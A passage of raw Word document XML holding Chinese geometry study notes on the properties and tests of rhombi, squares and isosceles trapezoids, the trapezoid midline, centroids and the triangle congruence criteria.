                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>菱形</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3211" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>①对边平行且四条边都相等；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>②对角相等；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>③对角线互相垂直平分，并且每一条对角线平分一组对角。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>①有一组邻边相等的平行四边形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>②四条边相等的四边形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>③对角线互相垂直的平行四边形。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>轴对称</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>中心对称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidTr="00E44832">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1008" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>正方形</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3211" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>①对边平行且四条边都</w:t>
            </w:r>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>相等；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>②四个角都相等都是直角；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>③两条对角线互相垂直平分且相等，每一条对角线平分一组对角。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>①有一个角是直角的菱形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>②有一组邻边相等的矩形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>③两条对角线垂直的矩形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>④两条对角线相等的菱形。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>轴对称</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>中心对称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidTr="00E44832">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1008" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>等腰</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>梯形</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3211" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>①一组对边平行而另一组对边不平行，两腰相等；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>②同一条底边上的两个角相等；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>③对角线相等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>①两腰相等的梯形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>②同一条底边上的两个角相等的梯形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>③两条对角线相等的梯形。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>轴对称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、梯形的中位线平行于梯形的两底边，并且等于两底和的一半。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>经过梯形一腰的中点与底平行的直线，必平分另一腰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、重心：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）线段重心是线段中点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）三角形重心是三条中线的交点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）平行四边形重心是两条对角线的交点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>全等图形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、全等多边形的对应边、对应角分别相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>全等三角形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>能够完全重合的两个三角形称为全等三角形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:t>互相重合的顶点叫做对应顶点，互相重合的边叫做对应边，互相重合的角叫做对应角。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>全等三角形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的性质：</w:t>
      </w:r>
      <w:r>
        <w:t>全等三角形的对应边相等，对应角相等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、全等三角形的判定：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）如果两个三角形的三条边分别对应相等，那么这两个三个角全等。（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）如果两个三角形有两边及其夹角分别对应相等，那么这两个三角形全等。（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）如果两个三角形的两个角及其夹边分别对应相等，那么这两个三角形全等。（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）有两个角及其中一个角的对边分别对应相等的两个三角形全等（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）如果两个直角三角形的斜边及一条直角边分别对应相等，那么这两个直角三角形全等。（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
